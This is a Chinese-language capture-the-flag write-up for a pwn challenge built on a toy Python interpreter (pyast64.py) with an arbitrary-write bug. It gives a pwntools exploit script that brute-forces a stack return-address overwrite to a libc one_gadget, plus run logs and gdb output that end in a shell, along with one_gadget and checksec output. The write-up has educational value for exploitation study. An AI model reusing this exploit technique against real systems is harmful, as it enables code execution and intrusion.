和xkt共同完成,题目是一个用python3运行的简易python解释器,可以任意地址写,读内存的功能被patch了。比赛时因为没发现ubuntu18.04默认的python3是没开PIE且GOT表可写的,所以采取了野蛮的解法:任意地址写,可以泄露栈地址,所以直接写栈上的main函数返回地址为one_gadget,复用main函数返回到的libc_start_main地址的高字节,写低三字节,需要爆破1.5字节,概率为1/4096。
本地exp如下,仅限ubuntu18.04,不太稳定,可能需要多次运行:
from pwn import *
payload = '''
def f():
b = array(16)
a = b + 2219
a[0] = 0xaec41c * 0x100000 * 0x100000
'''
f = open("payload",'w')
f.write(payload)
f.close()
while(1):
try:
io = process(["python3","pyast64.py","payload"])
io.sendline("ls");io.recv()
io.sendline("ls");io.recv()
io.sendline("ls");io.recv()
break
except:
io.close()
io.interactive()
1/4096,比较看人品,比赛时候远程5分钟就出了:
➜ python exp.py
[+] Starting local process '/usr/bin/python3': pid 61825
[*] Process '/usr/bin/python3' stopped with exit code -11 (SIGSEGV) (pid 61825)
[+] Starting local process '/usr/bin/python3': pid 61835
[*] Stopped process '/usr/bin/python3' (pid 61835)
[+] Starting local process '/usr/bin/python3': pid 61855
[*] Stopped process '/usr/bin/python3' (pid 61855)
[+] Starting local process '/usr/bin/python3': pid 61863
[*] Process '/usr/bin/python3' stopped with exit code -6 (SIGABRT) (pid 61863)
[+] Starting local process '/usr/bin/python3': pid 61871
[*] Process '/usr/bin/python3' stopped with exit code -11 (SIGSEGV) (pid 61871)
[+] Starting local process '/usr/bin/python3': pid 61879
[*] Process '/usr/bin/python3' stopped with exit code -11 (SIGSEGV) (pid 61879)
[+] Starting local process '/usr/bin/python3': pid 61887
[*] Stopped process '/usr/bin/python3' (pid 61887)
[+] Starting local process '/usr/bin/python3': pid 61895
[*] Process '/usr/bin/python3' stopped with exit code -11 (SIGSEGV) (pid 61895)
[+] Starting local process '/usr/bin/python3': pid 61903
[*] Process '/usr/bin/python3' stopped with exit code -11 (SIGSEGV) (pid 61903)
[+] Starting local process '/usr/bin/python3': pid 61911
[*] Process '/usr/bin/python3' stopped with exit code -11 (SIGSEGV) (pid 61911)
[+] Starting local process '/usr/bin/python3': pid 61919
[*] Stopped process '/usr/bin/python3' (pid 61919)
[+] Starting local process '/usr/bin/python3': pid 61927
[*] Switching to interactive mode
core entry exp.py flag libc-2.27.so payload payloadback pyast64.py test
$
gdb环境稳定getshell:
➜ cat payload
def f():
b = array(16)
a = b + 2219
a[0] = 0xaec41c * 0x100000 * 0x100000
➜ gdb -q --args python3 pyast64.py payload
GEF for linux ready, type `gef' to start, `gef config' to configure
77 commands loaded for GDB 8.1.1 using Python engine 3.6
[*] 3 commands could not be loaded, run `gef missing` to know why.
Reading symbols from python3...(no debugging symbols found)...done.
gef➤ r
Starting program: /usr/bin/python3 pyast64.py payload
[Thread debugging using libthread_db enabled]
Using host libthread_db library "/lib/x86_64-linux-gnu/libthread_db.so.1".
jit return: 0
process 46700 is executing new program: /bin/dash
$ ls
core entry exp.py flag libc-2.27.so payload pyast64.py
$
只有0x10a41c这个gadget满足要求:
➜ one_gadget libc-2.27.so
0x4f3d5 execve("/bin/sh", rsp+0x40, environ)
constraints:
rsp & 0xf == 0
rcx == NULL
0x4f432 execve("/bin/sh", rsp+0x40, environ)
constraints:
[rsp+0x40] == NULL
0x10a41c execve("/bin/sh", rsp+0x70, environ)
constraints:
[rsp+0x70] == NULL
python3没开PIE:
➜ cat /proc/version
Linux version 4.15.0-158-generic (buildd@lgw01-amd64-051)
(gcc version 7.5.0 (Ubuntu 7.5.0-3ubuntu1~18.04))
#166-Ubuntu SMP Fri Sep 17 19:37:52 UTC 2021
➜ checksec `which python3`
[*] '/usr/bin/python3'
Arch: amd64-64-little
RELRO: Partial RELRO
Stack: Canary found
NX: NX enabled
PIE: No PIE (0x400000)
FORTIFY: Enabled